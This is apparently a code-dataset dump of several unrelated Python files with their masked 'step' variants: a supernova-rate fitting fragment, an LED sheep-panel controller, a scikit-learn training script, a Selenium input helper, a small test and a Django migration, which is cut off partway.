4))\n\n\n\n MinObj.set_strategy(2)\n MinObj.migrad()\n #MinObj.minos()\n zCenters = (simBins[1:] + simBins[:-1])/2.0\n print MinObj.values\n fJs = []\n fJErrs = []\n for v in MinObj.values.keys():\n fJs.append(MinObj.values[v])\n fJErrs.append(MinObj.errors[v])\n\n \n exec('lamChi22 = lambda k, Beta: self.chi2V2(fJs, fJErrs, zCenters, k, Beta)',locals())\n exec('MinObj2 = M(lamChi22, k = 1.0, error_k = 0.1, limit_k = (0.0, None), Beta = 0.0, error_Beta = 0.1)',locals())\n\n\n #print \"Large Perfect Sim {0}\".format(simInd)\n #print \"Sim R0 = 1.7E-5; Sim Beta = 4.2\"\n ##print \"Sim Beta = 1.5; Data Beta = 1.5\"\n ##RateTest = Rate_Fitter('DES_FULLSURVEY_TEST/JLDESFULLSURVEYIaOnly+zPHOT+smearC11/FITOPT000+SALT2mu.FITRES', 'JLDESFULLSURVEYIaOnly+zPHOT+smearC11','JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow/FITOPT000+SALT2mu.FITRES', 'JLDES_R0_7E-5_Beta_1-5_Shallow','/project/rkessler/SN/SNDATA_ROOT/SIM/JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow.DUMP')\n #print '/project/rkessler/jlasker/Rate_Analysis/TestSameK2Beta/outFit_datasize/JLDES_R0_1-7E-5_Beta_4-2_Datasize_Perfect-00{0:02d}/FITOPT000.FITRES'.format(simInd)\n\n #RateTest = Rate_Fitter('/project/rkessler/jlasker/Rate_Analysis/TestSameK2Beta/outFit_datasize/JLDES_R0_1-7E-5_Beta_4-2_Datasize_Perfect-00{0:02d}/FITOPT000.FITRES'.format(simInd), 'TestSameK2Beta/JLDES_R0_1-7E-5_Beta_4-2-00{0:02d}'.format(simInd),'/project/rkessler/jlasker/Rate_Analysis/outFit_datalike/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT/FITOPT000.FITRES', 'JLDES_R0_1-7E-5_Beta_2-1_DataLikePhotZ','/scratch/midway2/rkessler/SNDATA_ROOT/SIM/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT.DUMP', 2.1, zmin = 0.1, zmax = 1.3)# , MJDMin = 0, MJDMax = np.inf)\n\n\n #RateTest.effCalc(nbins = 12)\n ##RateTest.effCalc(nbins = 20)\n #RateTest.fit_rate()\n\n\n #ksPerf.append(RateTest.k)\n #kErrsPerf.append(RateTest.kErr)\n #BetasPerf.append(RateTest.Beta)\n #BetaErrsPerf.append(RateTest.BetaErr)\n #print \"Sim Beta = 1.5; Data Beta = 1.5\"\n #RateTest = Rate_Fitter('DES_FULLSURVEY_TEST/JLDESFULLSURVEYIaOnly+zPHOT+smearC11/FITOPT000+SALT2mu.FITRES', 'JLDESFULLSURVEYIaOnly+zPHOT+smearC11','JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow/FITOPT000+SALT2mu.FITRES', 'JLDES_R0_7E-5_Beta_1-5_Shallow','/project/rkessler/SN/SNDATA_ROOT/SIM/JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow.DUMP')\n\n\n try:\n optfname = argv[1]\n opts = open(optfname, 'r')\n optlist = opts.readlines()\n\n zmin = None; zmax = None; MJDMin = None; MJDMax = None; bins = None; runFit = None\n\n for opt in optlist:\n try: \n optName, optVal = opt.split()\n except:\n print \"{0} not formatted correctly\".format(opt)\n continue\n\n if (optName.lower() == 'zmin') & (not zmin): zmin = optVal\n if (optName.lower() == 'zmax') & (not zmax): zmax = optVal\n if (optName.lower() == 'mjdmin') & (not MJDMin): MJDMin = optVal\n if (optName.lower() == 'mjdmax') & (not MJDMax): MJDMax = optVal\n if (optName.lower() == 'bins') & (not bins): zmin = optVal\n if (optName.lower() == 'runfit') & (not runFit == None): zmin = optVal\n\n if zmin == None: zmin = 0.1\n if zmax == None: zmax = 1.2\n if MJDMin == None: MJDMin = 0.0\n if MJDMax == None: MJDMax = np.inf\n if bins == None: bins = \"equalSize\"\n if runFit == None: runFit = True\n\n except:\n print \"Option File not working/Nonexistent. Using default values\"\n '''", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from collections import defaultdict, namedtuple from color import RGB, clamp import math import controls_model as controls from eyes import Eye, MutableEye from geom import ALL #from icicles.ice_geom import ALL def load_geometry(mapfile): """ Load sheep neighbor geometry Returns a map { panel: [(edge-neighbors), (vertex-neighbors)], ... } """ with open(mapfile, 'r') as f: def blank_or_comment(l): return l.startswith('#') or len(l) == 0 lines = [l.strip() for l in f.readlines()] lines = [l for l in lines if not blank_or_comment(l)] def to_ints(seq): return [int(x) for x in seq] def p(raw): "returns a tuple containing ([a,a,a], [b,b,b]) given a raw string" raw = raw.strip() if ' ' not in raw: return (to_ints(raw.split(',')), None) else: # print ">>%s<<" % raw a,b = raw.split() return (to_ints(a.split(',')), to_ints(b.split(','))) dat = {} # defaultdict(list) for line in lines: # print line (num, rest) = line.split(' ', 1) dat[int(num)] = p(rest.strip()) return dat _neighbor_map = load_geometry('data/geom.txt') def edge_neighbors(panel): "Return the list of panel ids that share an edge with a given panel" try: panel = int(panel) out = _neighbor_map[panel][0] if out is None: return [] return out except Exception, e: return [] def vertex_neighbors(panel): "Return the list of panel ids that share a vertex (but not an edge) with a given panel" try: panel = int(panel) out = _neighbor_map[panel][1] if out is None: return [] return out except Exception, e: return [] ## ## Convenience wrapper to pass around three separate sheep objects ## SheepSides = namedtuple('SheepSides', ['both', 'party', 'business', 'party_eye', 'business_eye']) def make_sheep(model): return SheepSides(both=Sheep(model, 'a'), party=Sheep(model, 'p'), business=Sheep(model, 'b'), party_eye=Eye(model, 'p'), business_eye=Eye(model, 'b')) def make_eyes_only_sheep(sides): null = NullSheep() return SheepSides(both=null, party=null, business=null, party_eye = sides.party_eye, business_eye = sides.business_eye) def make_mutable_sheep(sides): return SheepSides( both=MutableSheep(sides.both), party=MutableSheep(sides.party), business=MutableSheep(sides.business), party_eye=MutableEye(sides.party_eye), business_eye=MutableEye(sides.business_eye) ) ## ## Sheep class to represent one or both sides of the sheep ## VALID_SIDES=set(['a', 'b', 'p']) TEST_COLORS = [ RGB(141,211,199),RGB(255,255,179),RGB(190,186,218),RGB(251,128,114),RGB(128,177,211),RGB(253,180,98),RGB(179,222,105),RGB(252,205,229),RGB(217,217,217),RGB(188,128,189),RGB(204,235,197),RGB(255,237,111) ] class Sheep(object): def __init__(self, model, side): self.model = model if side not in VALID_SIDES: raise Exception("%s is not a valid side. use one of a,b,p") self.side = side self.cells = set(ALL) self.cm = None self.handle_colorized = False self._brightness = 1.0 def __repr__(self): return "Sheep(%s, side='%s')" % (self.model, self.side) def set_brightness(self, val): self._brightness = val def all_cells(self): "Return the list of valid cell IDs" return ALL # handle setting both sides here to keep the commands sent # to the simulator as close as possible to the actual hardware def _resolve(self, cell): """ Translate an integer cell id into a model cell identifier 'a' will be translated into two cells """ if cell in self.cells: if self.side == 'a': return [str(cell)+'b', str(cell)+'p'] else: return [str(cell) + self.side] else: return [] def set_cell(self, cell, color): if isinstance(cell, list): return self.set_cells(cell, color) # a single set_cell call may result in two panels being set c = self._resolve(cell) if not c: return if self.handle_colorized and self.cm: color = color.colorize(self.cm.colorized) if self._brightness < 1.0: color = color.copy() color.v = color.v * self._brightness # print "setting", c self.model.set_cells(c, color) def set_cells(self, cells, color): if cells is None: return resolved = [] for c in cells: if isinstance(c, list): for cb in c: resolved.extend(self._resolve(cb)) else: resolved.extend(self._resolve(c)) if self.handle_colorized and self.cm: color = color.colorize(self.cm.colorized) if self._brightness < 1.0: color = color.copy() color.v = color.v * self._brightness # print "setting", resolved self.model.set_cells(resolved, color) def set_all_cells(self, color): self.set_cells(ALL, color) def clear(self): "" self.set_all_cells(RGB(0,0,0)) # AAck! Never call go like this. Let the main loop # handle the timing!!! :( # self.go() def go(self): self.model.go() # convenience methods in case you only have a sheep object def edge_neighbors(self, cell): return edge_neighbors(cell) def vertex_neighbors(self, cell): return vertex_neighbors(cell) def set_test_colors(self): ix = 0 for p in ALL: self.set_cell(p, TEST_COLORS[ix]) ix += 1 if ix == len(TEST_COLORS): ix = 0 class NullSheep(object): """ An implementation of the Sheep side interface that does nothing. This can be handed to a show which might try to modify it, and thus can run without crashing, while only the eye modifications are used. """ def all_cells(self): return ALL def set_cell(self, cell, color): pass def set_cells(self, cells, color): pass def set_all_cells(self, color): pass def clear(self): pass def go(self): pass def edge_neighbors(self, cell): return edge_neighbors(cell) def vertex_neighbors(self, cell): return vertex_neighbors(cell) def set_test_colors(self): pass class MutableSheep(object): """ An implementation of the Sheep side interface which can be muted - that is, when muted, this sheep will act like the NullSheep, but when unmuted it will pass things to it's parent """ def __init__(self, parent): self.parent = parent self.muted = False def set_cell(self, cell, color): if self.muted: return self.parent.set_cell(cell, color) def set_cells(self, cells, color): if self.muted: return self.parent.set_cells(cells, color) def set_all_cells(self, color): if self.muted: return self.parent.set_all_cells(color) def clear(self): if self.muted: return self.parent.clear() def go(self): if self.muted: return self.parent.go() def set_test_colors(self): self.parent.set_test_colors() def all_cells(self): return self.parent.all_cells() def edge_neighbors(self, cell): return self.parent.edge_neighbors(cell) def vertex_neighbors(self, cell): return self.parent.vertex_neighbors(cell)
normal
{ "blob_id": "fe01b78d29dc456f7a537dd5639bc658fc184e36", "index": 5035, "step-1": "from collections import defaultdict, namedtuple\nfrom color import RGB, clamp\n\nimport math\n\nimport controls_model as controls\nfrom eyes import Eye, MutableEye\n\nfrom geom import ALL\n#from icicles.ice_geom import ALL\n\ndef load_geometry(mapfile):\n \"\"\"\n Load sheep neighbor geometry\n Returns a map { panel: [(edge-neighbors), (vertex-neighbors)], ... }\n \"\"\"\n with open(mapfile, 'r') as f:\n def blank_or_comment(l):\n return l.startswith('#') or len(l) == 0\n lines = [l.strip() for l in f.readlines()]\n lines = [l for l in lines if not blank_or_comment(l)]\n\n def to_ints(seq):\n return [int(x) for x in seq]\n\n def p(raw):\n \"returns a tuple containing ([a,a,a], [b,b,b]) given a raw string\"\n raw = raw.strip()\n if ' ' not in raw:\n return (to_ints(raw.split(',')), None)\n else:\n # print \">>%s<<\" % raw\n a,b = raw.split()\n return (to_ints(a.split(',')), to_ints(b.split(',')))\n\n dat = {} # defaultdict(list)\n for line in lines:\n # print line\n (num, rest) = line.split(' ', 1)\n dat[int(num)] = p(rest.strip())\n\n return dat\n\n_neighbor_map = load_geometry('data/geom.txt')\n\ndef edge_neighbors(panel):\n \"Return the list of panel ids that share an edge with a given panel\"\n try:\n panel = int(panel)\n out = _neighbor_map[panel][0]\n if out is None:\n return []\n\n return out\n except Exception, e:\n return []\n\ndef vertex_neighbors(panel):\n \"Return the list of panel ids that share a vertex (but not an edge) with a given panel\"\n try:\n panel = int(panel)\n out = _neighbor_map[panel][1]\n if out is None:\n return []\n\n return out\n except Exception, e:\n return []\n\n##\n## Convenience wrapper to pass around three separate sheep objects\n##\nSheepSides = namedtuple('SheepSides', ['both', 'party', 'business', 'party_eye', 'business_eye'])\n\ndef make_sheep(model):\n return SheepSides(both=Sheep(model, 'a'),\n party=Sheep(model, 'p'),\n business=Sheep(model, 'b'),\n party_eye=Eye(model, 'p'),\n business_eye=Eye(model, 'b'))\n\ndef make_eyes_only_sheep(sides):\n null = NullSheep()\n return SheepSides(both=null, party=null, business=null, party_eye = sides.party_eye, business_eye = sides.business_eye)\n\ndef make_mutable_sheep(sides):\n return SheepSides(\n both=MutableSheep(sides.both),\n party=MutableSheep(sides.party),\n business=MutableSheep(sides.business),\n party_eye=MutableEye(sides.party_eye),\n business_eye=MutableEye(sides.business_eye)\n )\n##\n## Sheep class to represent one or both sides of the sheep\n##\nVALID_SIDES=set(['a', 'b', 'p'])\nTEST_COLORS = [\nRGB(141,211,199),RGB(255,255,179),RGB(190,186,218),RGB(251,128,114),RGB(128,177,211),RGB(253,180,98),RGB(179,222,105),RGB(252,205,229),RGB(217,217,217),RGB(188,128,189),RGB(204,235,197),RGB(255,237,111)\n]\n\nclass Sheep(object):\n def __init__(self, model, side):\n self.model = model\n if side not in VALID_SIDES:\n raise Exception(\"%s is not a valid side. use one of a,b,p\")\n self.side = side\n self.cells = set(ALL)\n self.cm = None\n self.handle_colorized = False\n\n self._brightness = 1.0\n\n def __repr__(self):\n return \"Sheep(%s, side='%s')\" % (self.model, self.side)\n\n def set_brightness(self, val):\n self._brightness = val\n\n def all_cells(self):\n \"Return the list of valid cell IDs\"\n return ALL\n\n # handle setting both sides here to keep the commands sent\n # to the simulator as close as possible to the actual hardware\n def _resolve(self, cell):\n \"\"\"\n Translate an integer cell id into a model cell identifier\n 'a' will be translated into two cells\n \"\"\"\n if cell in self.cells:\n if self.side == 'a':\n return [str(cell)+'b', str(cell)+'p']\n else:\n return [str(cell) + self.side]\n else:\n return []\n\n def set_cell(self, cell, color):\n if isinstance(cell, list):\n return self.set_cells(cell, color)\n\n # a single set_cell call may result in two panels being set\n c = self._resolve(cell)\n if not c:\n return\n\n if self.handle_colorized and self.cm:\n color = color.colorize(self.cm.colorized)\n\n if self._brightness < 1.0:\n color = color.copy()\n color.v = color.v * self._brightness\n\n # print \"setting\", c\n self.model.set_cells(c, color)\n\n def set_cells(self, cells, color):\n if cells is None:\n return\n\n resolved = []\n for c in cells:\n if isinstance(c, list):\n for cb in c:\n resolved.extend(self._resolve(cb))\n else:\n resolved.extend(self._resolve(c))\n\n if self.handle_colorized and self.cm:\n color = color.colorize(self.cm.colorized)\n\n if self._brightness < 1.0:\n color = color.copy()\n color.v = color.v * self._brightness\n\n # print \"setting\", resolved\n self.model.set_cells(resolved, color)\n\n def set_all_cells(self, color):\n self.set_cells(ALL, color)\n\n def clear(self):\n \"\"\n self.set_all_cells(RGB(0,0,0))\n # AAck! Never call go like this. Let the main loop\n # handle the timing!!! :(\n # self.go()\n\n def go(self):\n self.model.go()\n\n # convenience methods in case you only have a sheep object\n def edge_neighbors(self, cell):\n return edge_neighbors(cell)\n\n def vertex_neighbors(self, cell):\n return vertex_neighbors(cell)\n\n def set_test_colors(self):\n ix = 0\n for p in ALL:\n self.set_cell(p, TEST_COLORS[ix])\n ix += 1\n if ix == len(TEST_COLORS):\n ix = 0\n\n\nclass NullSheep(object):\n \"\"\"\n An implementation of the Sheep side interface that does nothing. This\n can be handed to a show which might try to modify it, and thus can run\n without crashing, while only the eye modifications are used.\n \"\"\"\n def all_cells(self):\n return ALL\n\n def set_cell(self, cell, color):\n pass\n\n def set_cells(self, cells, color):\n pass\n\n def set_all_cells(self, color):\n pass\n\n def clear(self):\n pass\n\n def go(self):\n pass\n\n def edge_neighbors(self, cell):\n return edge_neighbors(cell)\n\n def vertex_neighbors(self, cell):\n return vertex_neighbors(cell)\n\n def set_test_colors(self):\n pass\n\n\nclass MutableSheep(object):\n \"\"\"\n An implementation of the Sheep side interface which can be muted -\n that is, when muted, this sheep will act like the NullSheep, but when\n unmuted it will pass things to it's parent\n \"\"\"\n\n def __init__(self, parent):\n self.parent = parent\n self.muted = False\n\n def set_cell(self, cell, color):\n if self.muted:\n return\n\n self.parent.set_cell(cell, color)\n\n def set_cells(self, cells, color):\n if self.muted:\n return\n self.parent.set_cells(cells, color)\n\n def set_all_cells(self, color):\n if self.muted:\n return\n self.parent.set_all_cells(color)\n\n def clear(self):\n if self.muted:\n return\n self.parent.clear()\n\n def go(self):\n if self.muted:\n return\n\n self.parent.go()\n\n def set_test_colors(self):\n self.parent.set_test_colors()\n\n def all_cells(self):\n return self.parent.all_cells()\n\n def edge_neighbors(self, cell):\n return self.parent.edge_neighbors(cell)\n\n def vertex_neighbors(self, cell):\n return self.parent.vertex_neighbors(cell)\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from sklearn.linear_model import LinearRegression, LogisticRegression import numpy as np import pickle import os def Run(datasetFile): # Get file from user userFile = open(datasetFile, "r") # Starter list of all instances of the data file instanceList = [] instanceCount = 0 featureCount = 0 # put all instances in data file line by line into instanceList[] for instance in userFile: tempStr = instance instanceCount += 1 # Be sure to seperate the entries by commas for entry in tempStr.split(','): instanceList.append(entry) featureCount += 1 # Close file userFile.close() # Adjust size of feature count featureCount = int(featureCount / instanceCount) # With data now seperated we can make the numpy array and transpose it dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount).reshape(instanceCount, featureCount) # Get rid of all the '\n' in array for instance in range(instanceCount): dataFull[instance][featureCount-1] = dataFull[instance][featureCount-1].rstrip("\n") features = np.array(dataFull.T[0:featureCount-1]).astype(float).reshape(featureCount-1, instanceCount).T target = np.array(dataFull.T[featureCount-1]).astype(float) # Setup Machine Learning isClassification = False for i in range(len(target)): if int(target[i]) == 0 or int(target[i]) == 1: isClassification = True else: isClassification = False break mlModel = None if isClassification: mlModel = LogisticRegression().fit(features, target) else: mlModel = LinearRegression().fit(features, target) # Make new file for Model data tmpFileName, file_exe = os.path.splitext(datasetFile) newFilePath = tmpFileName + "MODEL" + ".sav" pickle.dump(mlModel, open(newFilePath, 'wb'))
normal
{ "blob_id": "ee7efea569b685ad8d6922e403421227e9ea6922", "index": 6277, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef Run(datasetFile):\n userFile = open(datasetFile, 'r')\n instanceList = []\n instanceCount = 0\n featureCount = 0\n for instance in userFile:\n tempStr = instance\n instanceCount += 1\n for entry in tempStr.split(','):\n instanceList.append(entry)\n featureCount += 1\n userFile.close()\n featureCount = int(featureCount / instanceCount)\n dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount\n ).reshape(instanceCount, featureCount)\n for instance in range(instanceCount):\n dataFull[instance][featureCount - 1] = dataFull[instance][\n featureCount - 1].rstrip('\\n')\n features = np.array(dataFull.T[0:featureCount - 1]).astype(float).reshape(\n featureCount - 1, instanceCount).T\n target = np.array(dataFull.T[featureCount - 1]).astype(float)\n isClassification = False\n for i in range(len(target)):\n if int(target[i]) == 0 or int(target[i]) == 1:\n isClassification = True\n else:\n isClassification = False\n break\n mlModel = None\n if isClassification:\n mlModel = LogisticRegression().fit(features, target)\n else:\n mlModel = LinearRegression().fit(features, target)\n tmpFileName, file_exe = os.path.splitext(datasetFile)\n newFilePath = tmpFileName + 'MODEL' + '.sav'\n pickle.dump(mlModel, open(newFilePath, 'wb'))\n", "step-3": "from sklearn.linear_model import LinearRegression, LogisticRegression\nimport numpy as np\nimport pickle\nimport os\n\n\ndef Run(datasetFile):\n userFile = open(datasetFile, 'r')\n instanceList = []\n instanceCount = 0\n featureCount = 0\n for instance in userFile:\n tempStr = instance\n instanceCount += 1\n for entry in tempStr.split(','):\n instanceList.append(entry)\n featureCount += 1\n userFile.close()\n featureCount = int(featureCount / instanceCount)\n dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount\n ).reshape(instanceCount, featureCount)\n for instance in range(instanceCount):\n dataFull[instance][featureCount - 1] = dataFull[instance][\n featureCount - 1].rstrip('\\n')\n features = np.array(dataFull.T[0:featureCount - 1]).astype(float).reshape(\n featureCount - 1, instanceCount).T\n target = np.array(dataFull.T[featureCount - 1]).astype(float)\n isClassification = False\n for i in range(len(target)):\n if int(target[i]) == 0 or int(target[i]) == 1:\n isClassification = True\n else:\n isClassification = False\n break\n mlModel = None\n if isClassification:\n mlModel = LogisticRegression().fit(features, target)\n else:\n mlModel = LinearRegression().fit(features, target)\n tmpFileName, file_exe = os.path.splitext(datasetFile)\n newFilePath = tmpFileName + 'MODEL' + '.sav'\n pickle.dump(mlModel, open(newFilePath, 'wb'))\n", "step-4": "from sklearn.linear_model import LinearRegression, LogisticRegression\nimport numpy as np\nimport pickle\nimport os\n\ndef Run(datasetFile):\n \n # Get file from user\n userFile = open(datasetFile, \"r\")\n \n # Starter list of all instances of the data file\n instanceList = []\n instanceCount = 0\n featureCount = 0 \n \n # put all instances in data file line by line into instanceList[] \n for instance in userFile:\n tempStr = instance\n instanceCount += 1\n \n # Be sure to seperate the entries by commas\n for entry in tempStr.split(','):\n instanceList.append(entry)\n featureCount += 1\n \n # Close file\n userFile.close()\n \n # Adjust size of feature count\n featureCount = int(featureCount / instanceCount)\n \n # With data now seperated we can make the numpy array and transpose it \n dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount).reshape(instanceCount, featureCount)\n \n # Get rid of all the '\\n' in array\n for instance in range(instanceCount):\n dataFull[instance][featureCount-1] = dataFull[instance][featureCount-1].rstrip(\"\\n\")\n \n features = np.array(dataFull.T[0:featureCount-1]).astype(float).reshape(featureCount-1, instanceCount).T\n target = np.array(dataFull.T[featureCount-1]).astype(float)\n \n # Setup Machine Learning\n isClassification = False\n for i in range(len(target)):\n if int(target[i]) == 0 or int(target[i]) == 1:\n isClassification = True\n else:\n isClassification = False\n break\n \n mlModel = None\n \n if isClassification:\n mlModel = LogisticRegression().fit(features, target)\n else:\n mlModel = LinearRegression().fit(features, target) \n\n \n # Make new file for Model data\n tmpFileName, file_exe = os.path.splitext(datasetFile)\n newFilePath = tmpFileName + \"MODEL\" + \".sav\"\n pickle.dump(mlModel, open(newFilePath, 'wb'))", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# -*- coding: utf-8 -*- from selenium.webdriver.common.keys import Keys from titan.components import Base class Input(Base): def clear(self): element = self.driver.find_element_by_xpath(self.params['xpath']) if self.params.get('clear', None): element.clear() return True element.click() space_num = self.params['space']if self.params.get('space', None) else 4 while space_num: space_num -= 1 element.send_keys(Keys.BACK_SPACE) def text(self): print(self.params) element = self.driver.find_element_by_xpath(self.params['xpath']) element.send_keys(self.params['text'])
normal
{ "blob_id": "7503a0c8f83ff0ce370ed7bce733b09d9a2c69c4", "index": 817, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n element.click()\n space_num = self.params['space'] if self.params.get('space', None\n ) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n element.click()\n space_num = self.params['space'] if self.params.get('space', None\n ) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n\n def text(self):\n print(self.params)\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n element.send_keys(self.params['text'])\n", "step-4": "from selenium.webdriver.common.keys import Keys\nfrom titan.components import Base\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n element.click()\n space_num = self.params['space'] if self.params.get('space', None\n ) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n\n def text(self):\n print(self.params)\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n element.send_keys(self.params['text'])\n", "step-5": "# -*- coding: utf-8 -*-\nfrom selenium.webdriver.common.keys import Keys\nfrom titan.components import Base\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n\n element.click()\n space_num = self.params['space']if self.params.get('space', None) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n\n def text(self):\n print(self.params)\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n element.send_keys(self.params['text'])\n\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
import kwic mystr = "hello world\nmy test\napples oranges" #asseirt(kwic0.kwic(mystr) == []) #assert(kwic1.kwic(mystr) == [mystr]) #assert(len(kwic3.kwic(mystr))==2) assert len(kwic.kwic(mystr)) == 3
normal
{ "blob_id": "1f21fdc9a198b31bb0d5bd6dd8f46a1b3b28ec94", "index": 6773, "step-1": "<mask token>\n", "step-2": "<mask token>\nassert len(kwic.kwic(mystr)) == 3\n", "step-3": "<mask token>\nmystr = \"\"\"hello world\nmy test\napples oranges\"\"\"\nassert len(kwic.kwic(mystr)) == 3\n", "step-4": "import kwic\nmystr = \"\"\"hello world\nmy test\napples oranges\"\"\"\nassert len(kwic.kwic(mystr)) == 3\n", "step-5": "import kwic\n\n\nmystr = \"hello world\\nmy test\\napples oranges\"\n#asseirt(kwic0.kwic(mystr) == [])\n#assert(kwic1.kwic(mystr) == [mystr])\n#assert(len(kwic3.kwic(mystr))==2)\nassert len(kwic.kwic(mystr)) == 3\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
dic = {} try: print(dic[55]) except Exception as err: print('Mensagem: ', err)
normal
{ "blob_id": "618aa64c08ebf8d9a0bc9662195ece2bbd485c17", "index": 1079, "step-1": "<mask token>\n", "step-2": "<mask token>\ntry:\n print(dic[55])\nexcept Exception as err:\n print('Mensagem: ', err)\n", "step-3": "dic = {}\ntry:\n print(dic[55])\nexcept Exception as err:\n print('Mensagem: ', err)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
# Generated by Django 2.1.5 on 2019-01-20 18:11 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Destination', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=50)), ('image', models.ImageField(upload_to='img/destinations')), ], ), migrations.CreateModel( name='Gallery', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=50)), ('image', models.ImageField(upload_to='img/tours')), ], ), migrations.CreateModel( name='Tour', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=50, verbose_name='title for admin')), ('status', models.BooleanField(default=False)), ('price', models.IntegerField()), ('stars', models.IntegerField(choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)])), ('feautured', models.BooleanField(default=True)), ('destination', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tours.Destination')), ], ), migrations.CreateModel( name='TourDetail', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=50)), ('descreption', models.TextField()), ('tour', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tours.Tour')), ], ), migrations.AddField( model_name='gallery', name='tour', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tours.Tour'), ), ]
normal
{ "blob_id": "6907a1e08d728732eebf81fec7c0dab8729448e2", "index": 9712, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Destination', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=50\n )), ('image', models.ImageField(upload_to='img/destinations'))]),\n migrations.CreateModel(name='Gallery', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('title', models.CharField(max_length=50)), (\n 'image', models.ImageField(upload_to='img/tours'))]), migrations.\n CreateModel(name='Tour', fields=[('id', models.AutoField(\n auto_created=True, primary_key=True, serialize=False, verbose_name=\n 'ID')), ('title', models.CharField(max_length=50, verbose_name=\n 'title for admin')), ('status', models.BooleanField(default=False)),\n ('price', models.IntegerField()), ('stars', models.IntegerField(\n choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)])), ('feautured',\n models.BooleanField(default=True)), ('destination', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'tours.Destination'))]), migrations.CreateModel(name='TourDetail',\n fields=[('id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID')), ('title', models.CharField(\n max_length=50)), ('descreption', models.TextField()), ('tour',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'tours.Tour'))]), migrations.AddField(model_name='gallery', name=\n 'tour', field=models.ForeignKey(on_delete=django.db.models.deletion\n .CASCADE, to='tours.Tour'))]\n", "step-4": "from django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Destination', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=50\n )), ('image', models.ImageField(upload_to='img/destinations'))]),\n migrations.CreateModel(name='Gallery', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('title', models.CharField(max_length=50)), (\n 'image', models.ImageField(upload_to='img/tours'))]), migrations.\n CreateModel(name='Tour', fields=[('id', models.AutoField(\n auto_created=True, primary_key=True, serialize=False, verbose_name=\n 'ID')), ('title', models.CharField(max_length=50, verbose_name=\n 'title for admin')), ('status', models.BooleanField(default=False)),\n ('price', models.IntegerField()), ('stars', models.IntegerField(\n choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)])), ('feautured',\n models.BooleanField(default=True)), ('destination', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'tours.Destination'))]), migrations.CreateModel(name='TourDetail',\n fields=[('id', models.AutoField(auto_created=True, 